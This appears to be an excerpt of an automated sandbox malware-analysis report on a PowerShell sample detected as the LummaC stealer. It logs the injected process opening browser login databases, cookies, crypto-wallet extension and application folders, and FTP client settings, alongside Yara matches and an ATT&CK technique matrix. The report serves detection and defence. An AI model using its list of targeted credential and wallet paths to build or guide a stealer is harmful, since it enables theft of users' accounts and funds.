Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\prefs.js	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\formhistory.sqlite	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\key4.db	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\FTPInfo	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\FTPbox	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\FTPRush	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\FTPGetter	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\ProgramData\SiteDesigner\3D-FTP	Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Binance	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Directory queried: C:\Users\user\Documents\NEBFQQYWPS	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Directory queried: C:\Users\user\Documents\NEBFQQYWPS	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Directory queried: C:\Users\user\Documents\NVWZAPQSQL	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Directory queried: C:\Users\user\Documents\NVWZAPQSQL	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Directory queried: C:\Users\user\Documents\GRXZDKKVDB	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Directory queried: C:\Users\user\Documents\GRXZDKKVDB	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Directory queried: C:\Users\user\Documents\IPKGELNTQY	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Directory queried: C:\Users\user\Documents\IPKGELNTQY	Jump to behavior

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match	File source: 13.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000C.00000002.2868710892.00000000043C5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2951364094.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: sslproxydump.pcap, type: PCAP

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	13 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	1 Disable or Modify Tools	2 OS Credential Dumping	1 System Time Discovery	Remote Services	1 Archive Collected Data	3 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Native API	1 Scheduled Task/Job	11 Process Injection	1 Deobfuscate/Decode Files or Information	LSASS Memory	13 File and Directory Discovery	Remote Desktop Protocol	31 Data from Local System	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	2 Command and Scripting Interpreter	Logon Script (Windows)	1 Scheduled Task/Job	3 Obfuscated Files or Information	Security Account Manager	55 System Information Discovery	SMB/Windows Admin Shares	1 Screen Capture	11 Non-Standard Port	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	1 Scheduled Task/Job	Login Hook	Login Hook	1 Software Packing	NTDS	451 Security Software Discovery	Distributed Component Object Model	2 Clipboard Data	4 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	1 PowerShell	Network Logon Script	Network Logon Script	1 Timestomp	LSA Secrets	241 Virtualization/Sandbox Evasion	SSH	Keylogging	115 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	2 Process Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	11 Masquerading	DCSync	1 Application Window Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	241 Virtualization/Sandbox Evasion	Proc Filesystem	2 System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	11 Process Injection	/etc/passwd and /etc/shadow	1 System Network Configuration Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report wEY98gM1Jj.ps1

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: LummaC

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Windows Analysis Report
wEY98gM1Jj.ps1